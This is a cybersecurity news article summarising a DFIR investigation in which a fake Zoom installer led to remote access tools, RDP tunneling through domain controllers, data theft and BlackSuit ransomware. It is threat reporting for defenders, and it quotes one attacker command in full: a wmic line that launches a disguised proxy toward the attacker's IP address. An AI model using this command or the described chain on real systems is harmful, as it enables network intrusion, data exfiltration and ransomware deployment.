Hackers Used Weaponized Zoom Installer to Gain RDP Access & Deploy BlackSuit Ransomware

Cybercriminals recently leveraged a fake Zoom installer to deploy BlackSuit ransomware across an enterprise network.

The attack began when an unsuspecting victim visited a malicious website mimicking Zoom’s official download page (zoommanager[.]com), where they downloaded what appeared to be a legitimate teleconferencing application installer.

Initial Malicious Zoom via zoommanager[.]com (Source – The DFIR Report)

The weaponized installer, created using Inno Setup, contained a malicious downloader known as “d3f@ckloader” built on Pascal scripting language.

Google News

This initial stage established persistence by adding the installation directory to Windows Defender exclusions and marking files as hidden.

The malware then connected to a Steam Community profile page to obtain the IP address hosting the second-stage malware.

The DFIR Report researchers noted that after downloading two ZIP archives from the command-and-control server, the malware executed both the legitimate Zoom installer (to maintain the illusion of normality) and the malicious payload.

This resulted in SectopRAT being injected into MSBuild.exe, which established initial persistence through a startup entry.

Execution graph (Source – The DFIR Report)

After nine days of dwell time, the attack escalated when SectopRAT deployed both Brute Ratel (known as “Badgers”) and Cobalt Strike beacons across the network.

These tools facilitated credential harvesting from LSASS memory and lateral movement using Windows remote service creation.

Lateral Movement (Source – The DFIR Report)

RDP Tunneling for Network Traversal

The most notable aspect of this intrusion was the attackers’ use of a proxy tool called QDoor to establish RDP access throughout the environment.

The malware was deployed on domain controllers and configured to proxy traffic to the attacker-controlled server at 143.244.146[.]183.

%WINDIR%\system32\cmd.exe /C wmic /node:"REDACTED" process call create "%WINDIR%\Temp\svhost.exe "143.244.146[.]183""

This tunneling technique allowed the threat actors to establish remote desktop connections through the compromised domain controller to access file servers, where they deployed WinRAR to archive sensitive data.

The attackers then exfiltrated approximately 934 MB of data using the cloud storage service Bublup before deploying BlackSuit ransomware using PsExec for remote execution.

The sophisticated multi-stage attack chain, combined with the nine-day dwell time, demonstrates the threat actors’ patience and methodical approach to maximizing both data theft and encryption impact.

Are You from SOC/DFIR Team? - Try Free Malware Research with ANY.RUN - Start Now

Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.